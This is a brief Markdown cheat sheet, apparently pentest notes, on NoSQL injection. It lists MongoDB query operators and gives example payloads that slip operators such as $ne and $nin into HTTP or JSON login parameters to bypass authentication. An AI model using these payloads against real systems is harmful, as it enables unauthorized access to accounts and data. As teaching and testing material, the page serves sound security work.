50 lines
1.1 KiB
Markdown
50 lines
1.1 KiB
Markdown
# NoSQL Injections
|
|
|
|
* No tables, but files (collections)
|
|
* Examples are Elasticsearch, MongoDB, Redis, CouchDB.
|
|
|
|
## Querying
|
|
* Filter instead of SQL queries
|
|
* [Redis docs](https://redis.io/documentation)
|
|
* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
|
|
* [Elasticsearch docs](https://www.elastic.co/guide/index.html)
|
|
|
|
## Operators
|
|
* A precondition to the injection is to know the most common operators listed below
|
|
```sql
|
|
$and
|
|
$or
|
|
$eq
|
|
$ne
|
|
$gt
|
|
$where
|
|
$exists
|
|
$regex
|
|
```
|
|
|
|
## Injection
|
|
|
|
The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server.
|
|
|
|
* Pass HTTP parameter as an array instead of `user=` and `password=` use
|
|
```sh
|
|
user[$operator]=foo&password[$operator]=bar
|
|
```
|
|
|
|
* Give a 2D array a chance as well while fiddling with the request in following way
|
|
```sh
|
|
user[$nin][]=foo
|
|
```
|
|
|
|
### Examples
|
|
|
|
* POST or GET parameters
|
|
```sh
|
|
username=admin&password[$ne]=admin
|
|
```
|
|
|
|
* JSON
|
|
```json
|
|
{"username":"user","password":{"$ne":""} }
|
|
```
|